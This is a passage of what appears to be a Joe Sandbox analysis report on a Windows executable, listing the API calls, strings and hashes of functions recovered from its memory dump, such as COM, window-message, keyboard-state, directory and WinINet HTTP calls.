                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 007687C6
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0076881B
                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00768821
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                              • Opcode ID: 0f4f04ccdb2a93f69381fee12981af65702bed316dff1bef44ce63b4525fa21e
                                                                                                                                                                                                                                                                              • Instruction ID: 3caf15b85823ea6e701e61b45c416fd6e254d86654a57d74ffed1d5454480a41
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f4f04ccdb2a93f69381fee12981af65702bed316dff1bef44ce63b4525fa21e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93C12B75A00109AFCB54DFA4C888DAEBBF5FF48314B148198F91ADB262DB34ED45CB91
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0075039F
                                                                                                                                                                                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 007503F8
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0075040A
                                                                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0075042A
                                                                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0075047D
                                                                                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00750491
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 007504A6
                                                                                                                                                                                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 007504B3
                                                                                                                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007504BC
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 007504CE
                                                                                                                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007504D9
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                              • Opcode ID: fa028facce082b7bfc21de05d79d35130ea136b54fcf75599fbe5642bada7e13
                                                                                                                                                                                                                                                                              • Instruction ID: 701a29e2001a74e03538da7dcb204735d9e3c1eec21430b0cb0a0f4147981cd7
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa028facce082b7bfc21de05d79d35130ea136b54fcf75599fbe5642bada7e13
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67417F75A00259DFCB10DFA4D8489EE7BB9FF08355F108029ED09A7261CB78AD45CB90
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0075A65D
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 0075A6DE
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 0075A6F9
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 0075A713
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 0075A728
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 0075A740
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0075A752
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0075A76A
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 0075A77C
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 0075A794
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 0075A7A6
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                                                                                                                              • Opcode ID: c5fea347080638fd1ba56944532282e8c3e48a364c4e6abb7e060dd3865e0707
                                                                                                                                                                                                                                                                              • Instruction ID: 8e83f278c3e79f546dafdc13a894897b217062ba951cfaa72149c3e25019a4be
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5fea347080638fd1ba56944532282e8c3e48a364c4e6abb7e060dd3865e0707
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA41B2745047CA7DFF31966088047E5BEB0AB25355F08866ADDC64A1C2EBDC9DCC8BA3
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                              • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                              • Opcode ID: 76783ce3e887d0ee27ced3c0b1ea982e9897f3d6a9bee777bb4234fad5d39727
                                                                                                                                                                                                                                                                              • Instruction ID: 64623eb08253793aa8e51f7459952ea83c36655c3e5700997e144c468464dc48
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76783ce3e887d0ee27ced3c0b1ea982e9897f3d6a9bee777bb4234fad5d39727
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A51D631A011169BCF14DF6CC9519FEB3A5BF653A0B20822DEA2AE7284D739DD40C7D1
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CoInitialize.OLE32 ref: 007741D1
                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 007741DC
                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00790B44,?), ref: 00774236
                                                                                                                                                                                                                                                                              • IIDFromString.OLE32(?,?), ref: 007742A9
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00774341
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00774393
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                              • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                              • Opcode ID: 88c1f184c7eece1da2a6fcbbdc44e25fb1b4113722e72d97e1f0282f70f68520
                                                                                                                                                                                                                                                                              • Instruction ID: f1443d47e527f913d1817f8d05df078c68d201adeb4672bf6dbf3252a9bfea14
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88c1f184c7eece1da2a6fcbbdc44e25fb1b4113722e72d97e1f0282f70f68520
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF61A071608701DFCB10DF64C888F6ABBE8BF49754F108949F98997292C778ED44CB92
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00768C9C
                                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00768CAC
                                                                                                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00768CB8
                                                                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00768D55
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768D69
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768D9B
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00768DD1
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768DDA
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                                                                              • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                              • Opcode ID: cbd9600842a6d025351b4d6f977b9c05596d01195e95ded5a10b79f1b71ce132
                                                                                                                                                                                                                                                                              • Instruction ID: 9790ca770289fda374b19148617b3e67c2dfc5abd0048ba2fa48a546ab67a825
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbd9600842a6d025351b4d6f977b9c05596d01195e95ded5a10b79f1b71ce132
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0618D725043099FCB50EF20C8449AEB3E9FF89320F04495DF98AC7291DB39E945CBA6
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateMenu.USER32 ref: 00784715
                                                                                                                                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00784724
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007847AC
                                                                                                                                                                                                                                                                              • IsMenu.USER32(?), ref: 007847C0
                                                                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 007847CA
                                                                                                                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007847F7
                                                                                                                                                                                                                                                                              • DrawMenuBar.USER32 ref: 007847FF
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                              • String ID: 0$F
                                                                                                                                                                                                                                                                              • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                              • Opcode ID: 86f411e01351aff91451f5aaa71d4ef899be798345521688dac93887b1467c2f
                                                                                                                                                                                                                                                                              • Instruction ID: 40dfeb8a758392a3099b1eb253b70a95c5ec0a5816d68354ace3b99e32e801ff
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86f411e01351aff91451f5aaa71d4ef899be798345521688dac93887b1467c2f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB417A75A0120AEFDB24EF64D848EAA7BB5FF09314F14802DFA45A7390D7B8AD10CB54
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 007528B1
                                                                                                                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 007528BC
                                                                                                                                                                                                                                                                              • GetParent.USER32 ref: 007528D8
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007528DB
                                                                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 007528E4
                                                                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 007528F8
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007528FB
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                              • Opcode ID: 73e0cdb77a01e50d532072e7812707f04fc8c100369974ee2dfc8baee68168dc
                                                                                                                                                                                                                                                                              • Instruction ID: 2aa0489bca0efa9bda8b4682e6006e2b7ac0bb6fdeee35ca3183294820799eb4
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73e0cdb77a01e50d532072e7812707f04fc8c100369974ee2dfc8baee68168dc
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A21C2B5A40118FBCF10ABA0CC89EFEBBB5EF06350F10411AB951A32D1DB7D5819DB64
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00752990
                                                                                                                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 0075299B
                                                                                                                                                                                                                                                                              • GetParent.USER32 ref: 007529B7
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007529BA
                                                                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 007529C3
                                                                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 007529D7
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007529DA
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                              • Opcode ID: a7935bd470cdb3675c6b83ec6f451f98a19c02dce9d3c4134de85a519c14ece3
                                                                                                                                                                                                                                                                              • Instruction ID: 00656d2f1f901f2c29ed95c58798f42758ebd5aefebd4a54a6e8dcdb8eb9d302
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7935bd470cdb3675c6b83ec6f451f98a19c02dce9d3c4134de85a519c14ece3
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D21F3B5E40118BBCF10ABA0CC85EFEBBB9EF05350F10401ABA51A3296DB7D5809DB64
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00784539
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0078453C
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00784563
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00784586
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007845FE
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00784648
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00784663
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0078467E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00784692
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 007846AF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 312131281-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006F2AF9
                                                                                                                                                                                                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 006F2B98
                                                                                                                                                                                                                                                                              • UnregisterHotKey.USER32(?), ref: 006F2D7D
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00733A1B
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00733A80
                                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00733AAD
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                              • String ID: close all
                                                                                                                                                                                                                                                                              • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007689F2
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768A06
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00768A30
                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00768A4A
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768A5C
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768AA5
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00768AF5
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                                                                              • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 00788992
                                                                                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0078899E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00788A79
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00788AAC
                                                                                                                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 00788AE4
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00788B06
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00788B1E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 4072528602-3772712737
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 006F74D7
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7567: GetClientRect.USER32(?,?), ref: 006F758D
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7567: GetWindowRect.USER32(?,?), ref: 006F75CE
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7567: ScreenToClient.USER32(?,?), ref: 006F75F6
                                                                                                                                                                                                                                                                              • GetDC.USER32 ref: 00736083
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00736096
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 007360A4
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 007360B9
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 007360C1
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00736152
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0076CCB7
                                                                                                                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0076CCDF
                                                                                                                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0076CD0F
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0076CD67
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 0076CD7B
                                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0076CD86
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007355AE,?,?,Bad directive syntax error,0078DCD0,00000000,00000010,?,?), ref: 0075A236
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,007355AE,?), ref: 0075A23D
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0075A301
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                              • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetParent.USER32 ref: 007529F8
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00752A0D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00752A9A
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                              • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                              • Opcode ID: 547e78ae2941d75bc9828a6a30d4ff0ea33cc9f9451919a3fe58a0e6516b1aff
                                                                                                                                                                                                                                                                              • Instruction ID: a9ebc6b6b2e03f43d69a167d1f422f57c1958519677da4d312b6e6e44439410a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 547e78ae2941d75bc9828a6a30d4ff0ea33cc9f9451919a3fe58a0e6516b1aff
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9511E3B6784306F9FA246624EC0BDE737AD8F16B25B308012FE04E40D2FBADA8464654
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 006F758D
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 006F75CE
                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 006F75F6
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 006F773A
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 006F775B
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Rect$Client$Window$Screen
